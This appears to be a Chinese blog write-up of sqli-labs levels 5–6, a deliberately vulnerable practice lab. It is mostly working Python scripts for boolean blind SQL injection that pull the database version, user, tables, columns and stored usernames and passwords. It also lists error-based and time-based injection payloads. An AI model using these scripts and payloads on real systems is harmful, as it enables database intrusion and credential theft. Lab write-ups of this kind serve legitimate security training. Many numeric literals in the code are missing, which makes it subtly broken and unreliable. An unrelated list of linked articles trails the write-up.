sqli-labs:5-6,盲注
思考1:当# --+都被过滤时,只能考虑闭合处理
思考2:union联合注入时必须先判断字段长度
eg. id=1' order by 3 and '1'='1
sqli5:
首先判断出对id经过了'处理
其次发现结果不再回显
ok那就盲注了,先判断mysql版本,版本过低可优先考虑dns边信道攻击。
bool盲注(and逻辑)的脚本(substr)
# -*- coding: utf- -*-
"""
Created on Sat Mar :: @author: kenshin
""" import requests,re
url = 'http://localhost/sqli-labs/Less-5/?id=1'
pattern_mark = 'You are in...........' def get_version(url):
#mysql版本标准:x.x.xx
#假设lstsion长度为5
lst = ['#' for x in range(, )]
lst[] = lst[] = '.'
for i in (,,,):
for ii in range(,):
payload = "\' and ascii(substr((select version()),"+str(i)+",1))="+str(ii)+" --+"
url_new = url + payload
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
lst[i-] = str(ii-)
break
sr = ''.join(lst)
print("the lstsion of mysql:"+sr) def get_user(url):
#假设user()长度为15
lst = ['#' for x in range(,)]
for i in range(,):
for ii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-@':
payload = "\' and substr((select user()),"+str(i)+",1)='"+ii+"' --+"
url_new = url + payload
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
lst[i-] = ii
print(ii)
break
sr = ''.join(lst)
print("the user of database: "+sr) def get_datadir(url):
#假设@@datadir长度为32
lst = ['#' for x in range(,)]
for i in range(,):
for ii in ':\\qwertyuiopasdfghjklzxcvbnm1234567890_-':
payload = "\' and substr((select @@datadir),"+str(i)+",1)='"+ii+"' --+"
url_new = url + payload
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
lst[i-] = ii
print(ii)
break
sr = ''.join(lst)
print(sr) def get_currTB(url):
#假设当前数据库最多有10个表[i标识]
for i in range(,):
#假设最长的表名长度为10[ii标识]
lst = ['#' for x in range(,)]
for ii in range(,):
for iii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-#':
payload = "\' and substr((select * from information_schema.tables where table_schema=database() limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+"
url_new = url + payload
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
lst[ii-] = iii
print(iii)
break
if(lst[ii-] == '#'):
break
sr = ''.join(lst)
print(sr) def get_Column(url,tb):
#假设当前列最多有3个字段[i标识]
for i in range(,):
#假设每个字段最长的数据长度为10
lst = ['#' for x in range(,)]
for ii in range(,):
for iii in '@qwertyuiopasdfghjklzxcvbnm1234567890_-#':
payload = "\' and substr((select column_name from information_schema.columns where table_name='"+tb+"' limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+"
url_new = url + payload
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
lst[ii-] = iii
print(iii)
break
if(lst[ii-] == '#'):
break
sr = ''.join(lst)
print(sr)
def get_data(url):
#假设当前列有10条数据[i标识]
for i in range(,):
#假设每条数据最长的数据长度为25
lst = ['#' for x in range(,)]
for ii in range(,):
for iii in '%@qwertyuiopasdfghjklzxcvbnm1234567890_-#':
#变量太多,payload一些变量在代码端自行设置TT
payload = "' and substr((select group_concat(id,'%',username,'%',password) from security.users where id="+str(i)+"),"+str(ii)+",1)='"+str(iii)+"' --+"
url_new = url + payload
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
lst[ii-] = iii
print(iii)
break
if(lst[ii-] == '#'):
break
sr = ''.join(lst)
print(sr)
"""
dnslog
""" #get_lstsion(url)
#get_user(url)
#get_datadir(url)
#get_currTB(url)
#tb = input("select table >> ")
#get_Column(url,tb)
get_data(url)
v1 bool型盲注脚本
# -*- coding: utf- -*-
"""
Created on Sat Mar :: @author: kenshin
""" import requests,re,time,sys
url = 'http://localhost/sqli-labs/Less-5/?id=1'
pattern_mark = 'You are in...........' def view_bar(num,total):
rate = num / total
rate_num = int(rate * )
r = '\r[%d%%]%s>' % (rate_num,'='*num)
sys.stdout.write(r)
sys.stdout.flush() def get_version(url):
#mysql版本标准:x.x.xx
#假设lstsion长度为5
lst = ['#' for x in range(, )]
lst[] = lst[] = '.'
for i in (,,,):
view_bar(i,)
for ii in range(,):
payload = "\' and ascii(substr((select version()),"+str(i)+",1))="+str(ii)+" --+"
url_new = url + payload
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
lst[i-] = str(ii-)
break
sr = ''.join(lst)
print("\nthe version of mysql:"+sr) def get_user(url):
#假设user()长度为15
lst = ['#' for x in range(,)]
for i in range(,):
view_bar(i,)
for ii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-@':
payload = "\' and substr((select user()),"+str(i)+",1)='"+ii+"' --+"
url_new = url + payload
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
lst[i-] = ii
break
sr = ''.join(lst)
print("\n the user of database: "+sr) def get_datadir(url):
#假设@@datadir长度为32
lst = ['#' for x in range(,)]
for i in range(,):
view_bar(i,)
for ii in ':\\qwertyuiopasdfghjklzxcvbnm1234567890_-':
payload = "\' and substr((select @@datadir),"+str(i)+",1)='"+ii+"' --+"
url_new = url + payload
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
lst[i-] = ii
break
sr = ''.join(lst)
print(sr)
time_end=time.time()
print("\ntotally cost: "+str(time_end-time_start) + "s") def get_currTB(url):
#假设当前数据库最多有10个表[i标识]
for i in range(,):
view_bar(i,)
#假设最长的表名长度为10[ii标识]
lst = ['#' for x in range(,)]
for ii in range(,):
for iii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-#':
payload = "\' and substr((select table_name from information_schema.tables where table_schema=database() limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+"
url_new = url + payload
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
lst[ii-] = iii
break
if(lst[ii-] == '#'):
break
sr = ''.join(lst)
print("\n"+sr) def get_Column(url,tb):
#假设当前列最多有3个字段[i标识]
for i in range(,):
view_bar(i,)
#假设每个字段最长的数据长度为10
lst = ['#' for x in range(,)]
for ii in range(,):
for iii in '@qwertyuiopasdfghjklzxcvbnm1234567890_-#':
payload = "\' and substr((select column_name from information_schema.columns where table_name='"+tb+"' limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+"
url_new = url + payload
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
lst[ii-] = iii
break
if(lst[ii-] == '#'):
break
sr = ''.join(lst)
print("\n"+sr)
def get_data(url):
time_start=time.time()
#假设当前列有10条数据[i标识]
for i in range(,):
view_bar(i,)
#假设每条数据最长的数据长度为25
lst = ['#' for x in range(,)]
for ii in range(,):
for iii in '%@qwertyuiopasdfghjklzxcvbnm1234567890_-#':
#变量太多,payload一些变量在代码端自行设置TT
payload = "' and substr((select group_concat(id,'%',username,'%',password) from security.users where id="+str(i)+"),"+str(ii)+",1)='"+str(iii)+"' --+"
url_new = url + payload
r = requests.get(url_new)
if(re.findall(pattern_mark,r.text)):
lst[ii-] = iii
break
if(lst[ii-] == '#'):
break
sr = ''.join(lst)
print("\n"+sr)
time_end=time.time()
print("totally cost: "+str(time_end-time_start) + "s")
"""
dnslog
""" #get_version(url)
#get_user(url)
#get_datadir(url)
#get_currTB(url)
#tb = input("select table >> ")
#get_Column(url,tb)
#get_data(url)
v2 增加了进度条
环境均为mysql 5.5.3
(left)
' and left(version(),1)=--+(php5.2版本可用,瞎报)
' and left(database(),)=>'a'--+(php5+版本可用
(substr)
' and substr((select database() limit 0,1),1,1)>'z'--+(php5+版本可用)
(regexp)
' and 1=(select from information_schema.columns where table_name='users' and column_name regexp '^username')--+(php5+版本可用)
(mid)
' and mid((SELECT IFNULL(CAST(username AS CHAR),0x20) FROM security.users ORDER BY id LIMIT 0,1),1,1)='d'--+(php5+版本可用)
补充:ascill和ord()可将字符转换为ascill码
sqli-6
对id经过了"处理
floor(rand(0)*2)报错(php 5+版本可用)
-1' union Select 1,count(*),concat(0x7e,(select user()),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>root@localhost
database()
@@datadir
...
-1' union select 1,count(*),concat(0x7e,(select schema_name from information_schema.schemata limit ,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>security
-1' union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit ,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>users
-1' union select 1,count(*),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit ,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>password
-1' union select 1,count(*),concat(0x7e,(select password from security.users limit 0,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>Dump
# -*- coding: utf- -*-
"""
Created on Sun Mar :: @author: kenshin
""" import requests,re
url = 'http://localhost/sqli-labs/Less-5/?id=-1'
pattern_mark = '~(.+?)~' def get_currDB(url):
payload = "\' union select 1,count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+"
url += payload
r = requests.get(url)
rst=re.findall(pattern_mark,r.text)
print(rst) get_currDB(url)
脚本
xpath函数报错
1' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) --+
=>5.5.53
利用数据的重复性
-' union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x --+
...
updatexml
' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+
sleep延时注入
' and If(substr(database(),1,1)='s',1,sleep(5))--+
BENCHMARK延时注入
1' UNION SELECT (IF(SUBSTRING(current,1,1)='s',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+
sqli-labs:5-6,盲注的更多相关文章
- SQLI LABS Basic Part(1-22) WriteUp
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...
- Sqli labs系列-less-3 。。。
原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...
- sql盲注之报错注入(附自动化脚本)
作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲 ...
- WEB安全--高级sql注入,爆错注入,布尔盲注,时间盲注
1.爆错注入 什么情况想能使用报错注入------------页面返回连接错误信息 常用函数 updatexml()if...floorextractvalue updatexml(,concat() ...
- 【sqli-labs】 less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)
加and http://localhost/sqli/Less-9/?id=1' and '1'='1%23 http://localhost/sqli/Less-9/?id=1' and '1'=' ...
- 【sqli-labs】 less8 GET - Blind - Boolian Based - Single Quotes (基于布尔的单引号GET盲注)
加单引号 没有任何信息输出 加and 页面变化,不正常是没有任何回显 http://localhost/sqli/Less-8/?id=1' and '1'='1 http://localhost/s ...
- 2019-9-9:渗透测试,基础学习,pydictor使用,sql盲注,docker使用,笔记
pydictor,强大的密码生成工具,可以合并密码字典,词频统计,去重,枚举数字字典生成字典python3 pydictor.py -base d --len 4 4 生成纯数字4位密码python3 ...
- Natas17 Writeup(sql盲注之时间盲注)
Natas17: 源码如下 /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) ...
- Natas15 Writeup(sql盲注之布尔盲注)
Natas15: 源码如下 /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) ...
- sql布尔盲注和时间盲注的二分脚本
布尔盲注: import requests url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/" ...
随机推荐
- spring boot 代理(not eligible for auto-proxying)
spring 事务机制网上的案例很多,关于事务 不能回滚也有很多的类型,不同的问题有不同的处理方案,本篇博客主要介绍两种事务不能回滚的问题解决方案: 问题一: 在同一个对象中有两个方法,分别未方 ...
- linux安装mysql5.1
一.卸载mysql 1.检测系统是否已经安装过mysql或其依赖,若已装过要先将其删除 # yum list installed | grep mysql mysql-libs.i686 ...
- Java 读取Excel 文件内容
在一个项目中,有一个需求,是把excel文件的内容转换为xml格式展示.在学习如何操作的过程中,首先是如何获取excel文件,其中操作的代码如下: 1.首先是导入需要的 jar, 下载地址:https ...
- PHP 在 Mac 的安装之路
半年前本以为有一些 Apache 和 PHP 的安装经验,今天在 Mac 上还是踩了很多坑. 坦诚地讲,这东西入门成本比 Node,Python 入门成本真的是大很多. Apache 的编译安装就是那 ...
- 【Nodejs】Node.js(Express)の環境構築
[Express]の環境 参考URL:http://expressjs.com/en/starter/generator.html ①Node.jsの準備 (参考URL:https://www.cnb ...
- poj3292(筛法+打表)
题目链接:https://vjudge.net/problem/POJ-3292 题意:定义4n+1数(简称H数),H数分为三类:unit,即为1; H-primes,只能分解为1×自身,类似于我们平 ...
- hdu 5154 拓扑排序
例题:hdu 5154 链接 http://acm.hdu.edu.cn/showproblem.php?pid=5154 题目意思是第一行先给出n和m表示有n件事,m个关系,接下来输入m行,每行有 ...
- TOJ 3973 Maze Again && TOJ 3128 简单版贪吃蛇
TOJ3973传送门:http://acm.tzc.edu.cn/acmhome/problemdetail.do?&method=showdetail&id=3973 时间限制(普通 ...
- 18. 4Sum (通用算法 nSum)
Given an array S of n integers, are there elements a, b, c, and d in S such that a + b + c + d = tar ...
- oracle 中decode函数用法
学习记录: 含义解释: decode(条件,值1,返回值1,值2,返回值2,...值n,返回值n,缺省值) 该函数的含义如下:IF 条件=值1 THEN RETURN(翻译值1)ELSIF 条件=值2 ...